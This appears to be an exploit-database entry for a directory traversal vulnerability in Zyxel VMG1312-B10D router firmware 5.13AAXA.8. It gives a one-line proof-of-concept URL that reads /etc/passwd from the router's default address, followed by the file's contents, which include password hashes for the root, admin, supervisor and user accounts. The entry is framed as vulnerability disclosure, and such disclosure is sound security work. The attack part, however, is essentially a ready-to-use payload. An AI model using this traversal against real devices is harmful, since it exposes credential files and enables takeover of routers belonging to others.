Zyxel VMG1312-B10D 5.13AAXA.8 Directory Traversal

2018.11.26

Credit: x-hayben21

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-22

# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
# PoC
@modem_gateway = "192.168.1.1" // default address
http://@modem_gateway/../../../../../../../../../../../../etc/passwd
here are the contents :
############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zyxel VMG1312-B10D 5.13AAXA.8 Directory Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.